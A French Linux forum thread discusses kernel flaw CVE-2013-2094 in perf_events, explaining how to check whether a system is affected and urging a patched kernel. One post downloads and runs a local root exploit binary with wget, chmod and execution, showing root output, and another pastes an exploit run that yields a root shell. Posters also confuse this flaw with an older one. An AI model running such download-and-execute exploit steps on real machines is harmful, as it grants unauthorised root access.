Faille critique b[/b] dans le noyau Linux
Article pondu le 17 Août 2009. Tu parles d’une nouveauté…
Dans le cas de la dernière faille médiatisé :
Vous pouvez vois si le module incriminé est embarqué :
grep CONFIG_PERF_EVENTS /boot/config-`uname -r`
Réponse de ‘yes’ alors il est possible que vous soyez impacté.
Pour tester a ne pas lancer depuis le compte root sous peine d’un kernel panic :
[code]# useradd -m -s /bin/bash testexploit
passwd testexploit (renseigner le mot de passe de votre choix)
su - testexploit
$ wget http://mirror.ikoula.com/pub/flaws/cve-2013-2094/test-exploit
$ chmod +x test-exploit
$ ./test-exploit[/code]
Si, après cette étape la commande « id » vous renvoie « uid=0 […] », votre machine est vulnérable.
id
uid=0(root) gid=0(root) groupes=0(root),1019(testexploit)
En rappel le kernel Debian de Squeeze et de Wheezy (donc à fortiori celui de Jessie et SID) ne sont plus impacté par une récente mise à jour.
Si vous n’avez pas encore rebooter il vous faut donc rebooter sur le kernel mise à jour récemment.
Sinon il vous faut en recompiler un d’urgence, la moindre faille dans un CMS peut permettre à un Kevin de prendre la main surla machine via cet exploit.
Un très grand merci à Linus pour avoir dédaigné en parler après un bien trop long silence …
D’après diverses annonces, la version 2.6.32 du noyau de Squeeze n’est pas vulnérable car < 2.6.37. D’ailleurs la récente annonce de sécurité Debian pour le noyau 2.6.32 de Squeeze ne mentionne pas cette faille.
Vous ne parlez pas de la même faille;
Celle du post original concerne les sockets;
L’autre, plus médiatisé récement, est lié à un soucis d’optimisation du compilo
[quote=“haleth”]Vous ne parlez pas de la même faille;
Celle du post original concerne les sockets;
L’autre, plus médiatisé récement, est lié à un soucis d’optimisation du compilo[/quote]
a la base c’etait petite blague mais exacte , voici le lien d’origine pour la nouvelle qui date de deux ans web.nvd.nist.gov/view/vuln/detai … -2013-2094
D’après diverses annonces, la version 2.6.32 du noyau de Squeeze n’est pas vulnérable car < 2.6.37. D’ailleurs la récente annonce de sécurité Debian pour le noyau 2.6.32 de Squeeze ne mentionne pas cette faille.[/quote]
Effectivement toutes mes plates l’apéro était raide.
A consulter :
bonjour,
dans le config:
root@alpha30:~# grep CONFIG_PERF_EVENTS /boot/config-uname -r
CONFIG_PERF_EVENTS=y
root@alpha30:~#
je dois recompiler ou j’attends une 3.9.0 avec les risques sur la version antérieure
3.8.5-20130514
je fais les MAJ chaque jour!
Salutations à vous
A+
JB1
Test le hack plutôt;
C’est une faille, le problème n’est pas la présence de l’option, le problème est une mauvaise implémentation de l’option;
C’est surement déjà corrigé;
Amusant la faille:
francois@portos:/tmp$ ./ex
2.6.37-3.x x86_64
sd@fucksheep.org 2010
root@portos:/tmp#
mais le code est quelque peu obscur…